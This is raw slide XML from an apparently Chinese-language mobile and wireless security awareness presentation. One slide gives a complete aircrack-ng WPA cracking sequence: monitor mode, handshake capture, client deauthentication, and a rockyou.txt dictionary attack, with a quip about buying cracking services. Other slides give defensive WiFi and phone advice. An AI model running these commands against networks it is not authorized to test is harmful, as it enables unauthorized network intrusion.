            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是一套用于破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>WEP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>WPA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的工具套装，一般用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>无线网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>密钥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>破解，从而非法进入未经许可的无线网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>airmon-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wlan0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>开启监控模式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>airodump-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wlan0mon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WiFi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>airodump-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -c 6 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> C8:3A:35:30:3E:C8 -w ~/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wlan0mon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>抓取握手</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aireplay-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wlan0mon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>强</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>制连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WiFi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的设中断，重新连接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aircrack-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -a2 -b C8:3A:35:30:3E:C8 -w /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/share/wordlists/rockyou.txt ~/*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>握手包破解，跑不出来找淘宝，你懂。。。。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="373835203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stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="139634" y="103806"/>
            <a:ext cx="901664" cy="736360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864862" y="514709"/>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967141"/>
            <a:ext cx="8494644" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【3】</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>移动安全</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="Heiti SC Light"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不要随意扫描二维码，不要点微信群内链接，不要点朋友圈链接，可保周全，紧记紧记！微信作为一个超级</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>app</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，申请权限多，手机厂商也乐于放权，真心应该给其浏览器内核加上沙箱，这样才能避免单个漏洞就完全控制微信的尴尬，这样才能无愧于用户对其信任</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Heiti SC Light"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="微信安卓系统">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864862" y="2496791"/>
            <a:ext cx="8234537" cy="4600693"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="95672517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714500" y="471986"/>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714500" y="1186067"/>
            <a:ext cx="9829800" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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【3】</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移动安全</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无线网络的安全</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a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</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）将手机</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WiFi</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设置为手动设置</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a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</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）不要在公共</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WiFi</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环境下操作网银</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3</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）不连接名称相似的迷惑</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WiFi</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4</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）开启密码双重验证</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5</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）不点击可疑链接，不安装可疑软件</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6</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）关闭流量分享功能</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7</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）尽量少分享私人信息</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endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="Heiti SC Light"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>路由器安全设置</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1</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）密码密码复杂的 加密方式</a:t>
            </a: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WPA1 WPA2</a:t>
            </a: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2</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）关闭</a:t>
            </a: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DHCP</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功能</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3</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）修改默认路由</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ip</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地址</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a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</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）绑定</a:t>
            </a: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Mac</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地址</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="Heiti SC Light"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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pic>
        <p:nvPicPr>
          <p:cNvPr id="28676" name="Picture 4" descr="http://imgsrc.baidu.com/forum/w=580/sign=cc70190c7ad98d1076d40c39113eb807/9c4d88389b504fc237cf3ff5e3dde71191ef6d1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750300" y="2429964"/>
            <a:ext cx="2679700" cy="2806660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28678" name="Picture 6" descr="http://www.mxpcp.com/uploadfile/2014/1127/20141127083256821.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37584" y="2429964"/>
            <a:ext cx="2612716" cy="28066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0075924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2717411" cy="417358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>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0x3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1975209"/>
            <a:ext cx="9679438" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【3】</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>移动安全</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Heiti SC Light"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Heiti SC Light"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Heiti SC Light"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>无线网络密码安全</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Heiti SC Light"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Heiti SC Light"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>口令句，一个神奇的密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(LYP82NLF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
